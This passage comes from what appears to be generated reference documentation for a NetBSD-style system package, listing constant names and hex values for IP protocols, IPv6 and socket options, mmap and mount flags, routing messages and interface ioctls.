| IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 856) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 857) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 858) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 859) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 860) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 861) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 862) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 863) | IN_LOOPBACKNET = 0x7f constant IPPROTO_AH (line 864) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 865) | IPPROTO_CARP = 0x70 constant IPPROTO_DONE (line 866) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 867) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 868) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 869) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 870) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 871) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 872) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 873) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 874) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 875) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 876) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 877) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 878) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 879) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 880) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 881) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 882) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 883) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 884) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 885) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IPV6_ICMP (line 886) | IPPROTO_IPV6_ICMP = 0x3a constant IPPROTO_MAX (line 887) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 888) | IPPROTO_MAXID = 0x34 constant IPPROTO_MOBILE (line 889) | IPPROTO_MOBILE = 0x37 constant IPPROTO_NONE (line 890) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 891) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 892) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 893) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 894) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 895) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 896) | IPPROTO_RSVP = 0x2e constant IPPROTO_TCP (line 897) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 898) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 899) | IPPROTO_UDP = 0x11 constant IPPROTO_VRRP (line 900) | IPPROTO_VRRP = 0x70 constant IPV6_CHECKSUM (line 901) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 902) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 903) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 904) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 905) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 906) | IPV6_DSTOPTS = 0x32 constant IPV6_FAITH (line 907) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 908) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 909) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 910) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 911) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 912) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 913) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 914) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 915) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 916) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 917) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 918) | IPV6_MAXPACKET = 0xffff constant IPV6_MMTU (line 919) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 920) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 921) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 922) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 923) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 924) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 925) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 926) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 927) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 928) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 929) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 930) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 931) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 932) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 933) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 934) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 935) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 936) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTHDR (line 937) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 938) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 939) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 940) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 941) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 942) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 943) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 944) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 945) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 946) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 947) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 948) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 949) | IP_ADD_MEMBERSHIP = 0xc constant IP_DEFAULT_MULTICAST_LOOP (line 950) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 951) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 952) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 953) | IP_DROP_MEMBERSHIP = 0xd constant IP_EF (line 954) | IP_EF = 0x8000 constant IP_ERRORMTU (line 955) | IP_ERRORMTU = 0x15 constant IP_HDRINCL (line 956) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 957) | IP_IPSEC_POLICY = 0x16 constant IP_MAXPACKET (line 958) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 959) | IP_MAX_MEMBERSHIPS = 0x14 constant IP_MF (line 960) | IP_MF = 0x2000 constant IP_MINFRAGSIZE (line 961) | IP_MINFRAGSIZE = 0x45 constant IP_MINTTL (line 962) | IP_MINTTL = 0x18 constant IP_MSS (line 963) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 964) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 965) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 966) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 967) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 968) | IP_OPTIONS = 0x1 constant IP_PORTRANGE (line 969) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 970) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 971) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 972) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 973) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 974) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 975) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 976) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x17 constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_TOS (line 980) | IP_TOS = 0x3 constant IP_TTL (line 981) | IP_TTL = 0x4 constant ISIG (line 982) | ISIG = 0x80 constant ISTRIP (line 983) | ISTRIP = 0x20 constant IXANY (line 984) | IXANY = 0x800 constant IXOFF (line 985) | IXOFF = 0x400 constant IXON (line 986) | IXON = 0x200 constant KERN_HOSTNAME (line 987) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 988) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 989) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 990) | KERN_VERSION = 0x4 constant LOCK_EX (line 991) | LOCK_EX = 0x2 constant LOCK_NB (line 992) | LOCK_NB = 0x4 constant LOCK_SH (line 993) | LOCK_SH = 0x1 constant LOCK_UN (line 994) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 995) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 996) | MADV_FREE = 0x6 constant MADV_NORMAL (line 997) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 998) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 999) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1000) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1001) | MADV_WILLNEED = 0x3 constant MAP_ALIGNMENT_16MB (line 1002) | MAP_ALIGNMENT_16MB = 0x18000000 constant MAP_ALIGNMENT_1TB (line 1003) | MAP_ALIGNMENT_1TB = 0x28000000 constant MAP_ALIGNMENT_256TB (line 1004) | MAP_ALIGNMENT_256TB = 0x30000000 constant MAP_ALIGNMENT_4GB (line 1005) | MAP_ALIGNMENT_4GB = 0x20000000 constant MAP_ALIGNMENT_64KB (line 1006) | MAP_ALIGNMENT_64KB = 0x10000000 constant MAP_ALIGNMENT_64PB (line 1007) | MAP_ALIGNMENT_64PB = 0x38000000 constant MAP_ALIGNMENT_MASK (line 1008) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 1009) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1010) | MAP_ANON = 0x1000 constant MAP_FILE (line 1011) | MAP_FILE = 0x0 constant MAP_FIXED (line 1012) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 1013) | MAP_HASSEMAPHORE = 0x200 constant MAP_INHERIT (line 1014) | MAP_INHERIT = 0x80 constant MAP_INHERIT_COPY (line 1015) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_DEFAULT (line 1016) | MAP_INHERIT_DEFAULT = 0x1 constant MAP_INHERIT_DONATE_COPY (line 1017) | MAP_INHERIT_DONATE_COPY = 0x3 constant MAP_INHERIT_NONE (line 1018) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1019) | MAP_INHERIT_SHARE = 0x0 constant MAP_NORESERVE (line 1020) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 1021) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1022) | MAP_RENAME = 0x20 constant MAP_SHARED (line 1023) | MAP_SHARED = 0x1 constant MAP_STACK (line 1024) | MAP_STACK = 0x2000 constant MAP_TRYFIXED (line 1025) | MAP_TRYFIXED = 0x400 constant MAP_WIRED (line 1026) | MAP_WIRED = 0x800 constant MCL_CURRENT (line 1027) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1028) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1029) | MNT_ASYNC = 0x40 constant MNT_BASIC_FLAGS (line 1030) | MNT_BASIC_FLAGS = 0xe782807f constant MNT_DEFEXPORTED (line 1031) | MNT_DEFEXPORTED = 0x200 constant MNT_DISCARD (line 1032) | MNT_DISCARD = 0x800000 constant MNT_EXKERB (line 1033) | MNT_EXKERB = 0x800 constant MNT_EXNORESPORT (line 1034) | MNT_EXNORESPORT = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1037) | MNT_EXPUBLIC = 0x10000000 constant MNT_EXRDONLY (line 1038) | MNT_EXRDONLY = 0x80 constant MNT_EXTATTR (line 1039) | MNT_EXTATTR = 0x1000000 constant MNT_FORCE (line 1040) | MNT_FORCE = 0x80000 constant MNT_GETARGS (line 1041) | MNT_GETARGS = 0x400000 constant MNT_IGNORE (line 1042) | MNT_IGNORE = 0x100000 constant MNT_LAZY (line 1043) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1044) | MNT_LOCAL = 0x1000 constant MNT_LOG (line 1045) | MNT_LOG = 0x2000000 constant MNT_NOATIME (line 1046) | MNT_NOATIME = 0x4000000 constant MNT_NOCOREDUMP (line 1047) | MNT_NOCOREDUMP = 0x8000 constant MNT_NODEV (line 1048) | MNT_NODEV = 0x10 constant MNT_NODEVMTIME (line 1049) | MNT_NODEVMTIME = 0x40000000 constant MNT_NOEXEC (line 1050) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 1051) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1052) | MNT_NOWAIT = 0x2 constant MNT_OP_FLAGS (line 1053) | MNT_OP_FLAGS = 0x4d0000 constant MNT_QUOTA (line 1054) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1055) | MNT_RDONLY = 0x1 constant MNT_RELATIME (line 1056) | MNT_RELATIME = 0x20000 constant MNT_RELOAD (line 1057) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1058) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1059) | MNT_SOFTDEP = 0x80000000 constant MNT_SYMPERM (line 1060) | MNT_SYMPERM = 0x20000000 constant MNT_SYNCHRONOUS (line 1061) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1062) | MNT_UNION = 0x20 constant MNT_UPDATE (line 1063) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1064) | MNT_VISFLAGMASK = 0xff90ffff constant MNT_WAIT (line 1065) | MNT_WAIT = 0x1 constant MSG_BCAST (line 1066) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1067) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CONTROLMBUF (line 1068) | MSG_CONTROLMBUF = 0x2000000 constant MSG_CTRUNC (line 1069) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1070) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1071) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1072) | MSG_EOR = 0x8 constant MSG_IOVUSRSPACE (line 1073) | MSG_IOVUSRSPACE = 0x4000000 constant MSG_LENUSRSPACE (line 1074) | MSG_LENUSRSPACE = 0x8000000 constant MSG_MCAST (line 1075) | MSG_MCAST = 0x200 constant MSG_NAMEMBUF (line 1076) | MSG_NAMEMBUF = 0x1000000 constant MSG_NBIO (line 1077) | MSG_NBIO = 0x1000 constant MSG_NOSIGNAL (line 1078) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1079) | MSG_OOB = 0x1 constant MSG_PEEK (line 1080) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1081) | MSG_TRUNC = 0x10 constant MSG_USERFLAGS (line 1082) | MSG_USERFLAGS = 0xffffff constant MSG_WAITALL (line 1083) | MSG_WAITALL = 0x40 constant MS_ASYNC (line 1084) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1085) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1086) | MS_SYNC = 0x4 constant NAME_MAX (line 1087) | NAME_MAX = 0x1ff constant NET_RT_DUMP (line 1088) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1089) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1090) | NET_RT_IFLIST = 0x5 constant NET_RT_MAXID (line 1091) | NET_RT_MAXID = 0x6 constant NET_RT_OIFLIST (line 1092) | NET_RT_OIFLIST = 0x4 constant NET_RT_OOIFLIST (line 1093) | NET_RT_OOIFLIST = 0x3 constant NFDBITS (line 1094) | NFDBITS = 0x20 constant NOFLSH (line 1095) | NOFLSH = 0x80000000 constant NOTE_ATTRIB (line 1096) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1097) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1098) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1099) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1100) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1101) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1102) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1103) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1104) | NOTE_LOWAT = 0x1 constant NOTE_PCTRLMASK (line 1105) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1106) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1107) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1108) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1109) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1110) | NOTE_TRACKERR = 0x2 constant NOTE_WRITE (line 1111) | NOTE_WRITE = 0x2 constant OCRNL (line 1112) | OCRNL = 0x10 constant OFIOGETBMAP (line 1113) | OFIOGETBMAP = 0xc004667a constant ONLCR (line 1114) | ONLCR = 0x2 constant ONLRET (line 1115) | ONLRET = 0x40 constant ONOCR (line 1116) | ONOCR = 0x20 constant ONOEOT (line 1117) | ONOEOT = 0x8 constant OPOST (line 1118) | OPOST = 0x1 constant O_ACCMODE (line 1119) | O_ACCMODE = 0x3 constant O_ALT_IO (line 1120) | O_ALT_IO = 0x40000 constant O_APPEND (line 1121) | O_APPEND = 0x8 constant O_ASYNC (line 1122) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1123) | O_CLOEXEC = 0x400000 constant O_CREAT (line 1124) | O_CREAT = 0x200 constant O_DIRECT (line 1125) | O_DIRECT = 0x80000 constant O_DIRECTORY (line 1126) | O_DIRECTORY = 0x200000 constant O_DSYNC (line 1127) | O_DSYNC = 0x10000 constant O_EXCL (line 1128) | O_EXCL = 0x800 constant O_EXLOCK (line 1129) | O_EXLOCK = 0x20 constant O_FSYNC (line 1130) | O_FSYNC = 0x80 constant O_NDELAY (line 1131) | O_NDELAY = 0x4 constant O_NOCTTY (line 1132) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1133) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1134) | O_NONBLOCK = 0x4 constant O_NOSIGPIPE (line 1135) | O_NOSIGPIPE = 0x1000000 constant O_RDONLY (line 1136) | O_RDONLY = 0x0 constant O_RDWR (line 1137) | O_RDWR = 0x2 constant O_RSYNC (line 1138) | O_RSYNC = 0x20000 constant O_SHLOCK (line 1139) | O_SHLOCK = 0x10 constant O_SYNC (line 1140) | O_SYNC = 0x80 constant O_TRUNC (line 1141) | O_TRUNC = 0x400 constant O_WRONLY (line 1142) | O_WRONLY = 0x1 constant PARENB (line 1143) | PARENB = 0x1000 constant PARMRK (line 1144) | PARMRK = 0x8 constant PARODD (line 1145) | PARODD = 0x2000 constant PENDIN (line 1146) | PENDIN = 0x20000000 constant PRIO_PGRP (line 1147) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1148) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1149) | PRIO_USER = 0x2 constant PRI_IOFLUSH (line 1150) | PRI_IOFLUSH = 0x7c constant PROT_EXEC (line 1151) | PROT_EXEC = 0x4 constant PROT_NONE (line 1152) | PROT_NONE = 0x0 constant PROT_READ (line 1153) | PROT_READ = 0x1 constant PROT_WRITE (line 1154) | PROT_WRITE = 0x2 constant RLIMIT_AS (line 1155) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1156) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1157) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1158) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1159) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1160) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1161) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1162) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1163) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1164) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1165) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1166) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1167) | RTAX_BRD = 0x7 constant RTAX_DST (line 1168) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1169) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1170) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1171) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1172) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1173) | RTAX_MAX = 0x9 constant RTAX_NETMASK (line 1174) | RTAX_NETMASK = 0x2 constant RTAX_TAG (line 1175) | RTAX_TAG = 0x8 constant RTA_AUTHOR (line 1176) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1177) | RTA_BRD = 0x80 constant RTA_DST (line 1178) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1179) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1180) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1181) | RTA_IFA = 0x20 constant RTA_IFP (line 1182) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1183) | RTA_NETMASK = 0x4 constant RTA_TAG (line 1184) | RTA_TAG = 0x100 constant RTF_ANNOUNCE (line 1185) | RTF_ANNOUNCE = 0x20000 constant RTF_BLACKHOLE (line 1186) | RTF_BLACKHOLE = 0x1000 constant RTF_CLONED (line 1187) | RTF_CLONED = 0x2000 constant RTF_CLONING (line 1188) | RTF_CLONING = 0x100 constant RTF_DONE (line 1189) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1190) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1191) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1192) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1193) | RTF_LLINFO = 0x400 constant RTF_MASK (line 1194) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 1195) | RTF_MODIFIED = 0x20 constant RTF_PROTO1 (line 1196) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1197) | RTF_PROTO2 = 0x4000 constant RTF_REJECT (line 1198) | RTF_REJECT = 0x8 constant RTF_SRC (line 1199) | RTF_SRC = 0x10000 constant RTF_STATIC (line 1200) | RTF_STATIC = 0x800 constant RTF_UP (line 1201) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1202) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1203) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1204) | RTM_CHANGE = 0x3 constant RTM_CHGADDR (line 1205) | RTM_CHGADDR = 0x15 constant RTM_DELADDR (line 1206) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1207) | RTM_DELETE = 0x2 constant RTM_GET (line 1208) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1209) | RTM_IEEE80211 = 0x11 constant RTM_IFANNOUNCE (line 1210) | RTM_IFANNOUNCE = 0x10 constant RTM_IFINFO (line 1211) | RTM_IFINFO = 0x14 constant RTM_LLINFO_UPD (line 1212) | RTM_LLINFO_UPD = 0x13 constant RTM_LOCK (line 1213) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1214) | RTM_LOSING = 0x5 constant RTM_MISS (line 1215) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1216) | RTM_NEWADDR = 0xc constant RTM_OIFINFO (line 1217) | RTM_OIFINFO = 0xf constant RTM_OLDADD (line 1218) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 1219) | RTM_OLDDEL = 0xa constant RTM_OOIFINFO (line 1220) | RTM_OOIFINFO = 0xe constant RTM_REDIRECT (line 1221) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1222) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1223) | RTM_RTTUNIT = 0xf4240 constant RTM_SETGATE (line 1224) | RTM_SETGATE = 0x12 constant RTM_VERSION (line 1225) | RTM_VERSION = 0x4 constant RTV_EXPIRE (line 1226) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1227) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1228) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1229) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1230) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1231) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1232) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1233) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1234) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1235) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1236) | SCM_CREDS = 0x4 constant SCM_RIGHTS (line 1237) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1238) | SCM_TIMESTAMP = 0x8 constant SHUT_RD (line 1239) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1240) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1241) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1242) | SIOCADDMULTI = 0x80906931 constant SIOCADDRT (line 1243) | SIOCADDRT = 0x8030720a constant SIOCAIFADDR (line 1244) | SIOCAIFADDR = 0x8040691a constant SIOCALIFADDR (line 1245) | SIOCALIFADDR = 0x8118691c constant SIOCATMARK (line 1246) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1247) | SIOCDELMULTI = 0x80906932 constant SIOCDELRT (line 1248) | SIOCDELRT = 0x8030720b constant SIOCDIFADDR (line 1249) | SIOCDIFADDR = 0x80906919 constant SIOCDIFPHYADDR (line 1250) | SIOCDIFPHYADDR = 0x80906949 constant SIOCDLIFADDR (line 1251) | SIOCDLIFADDR = 0x8118691e constant SIOCGDRVSPEC (line 1252) | SIOCGDRVSPEC = 0xc01c697b constant SIOCGETPFSYNC (line 1253) | SIOCGETPFSYNC = 0xc09069f8 constant SIOCGETSGCNT (line 1254) | SIOCGETSGCNT = 0xc0147534 constant SIOCGETVIFCNT (line 1255) | SIOCGETVIFCNT = 0xc0147533 constant SIOCGHIWAT (line 1256) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 1257) | SIOCGIFADDR = 0xc0906921 constant SIOCGIFADDRPREF (line 1258) | SIOCGIFADDRPREF = 0xc0946920 constant SIOCGIFALIAS (line 1259) | SIOCGIFALIAS = 0xc040691b constant SIOCGIFBRDADDR (line 1260) | SIOCGIFBRDADDR = 0xc0906923 constant SIOCGIFCAP (line 1261) | SIOCGIFCAP = 0xc0206976 constant SIOCGIFCONF (line 1262) | SIOCGIFCONF = 0xc0086926 constant SIOCGIFDATA (line 1263) | SIOCGIFDATA = 0xc0946985 constant SIOCGIFDLT (line 1264) | SIOCGIFDLT = 0xc0906977 constant SIOCGIFDSTADDR (line 1265) | SIOCGIFDSTADDR = 0xc0906922 constant SIOCGIFFLAGS (line 1266) | SIOCGIFFLAGS = 0xc0906911 constant SIOCGIFGENERIC (line 1267) | SIOCGIFGENERIC = 0xc090693a constant SIOCGIFMEDIA (line 1268) | SIOCGIFMEDIA = 0xc0286936 constant SIOCGIFMETRIC (line 1269) | SIOCGIFMETRIC = 0xc0906917 constant SIOCGIFMTU (line 1270) | SIOCGIFMTU = 0xc090697e constant SIOCGIFNETMASK (line 1271) | SIOCGIFNETMASK = 0xc0906925 constant SIOCGIFPDSTADDR (line 1272) | SIOCGIFPDSTADDR = 0xc0906948 constant SIOCGIFPSRCADDR (line 1273) | SIOCGIFPSRCADDR = 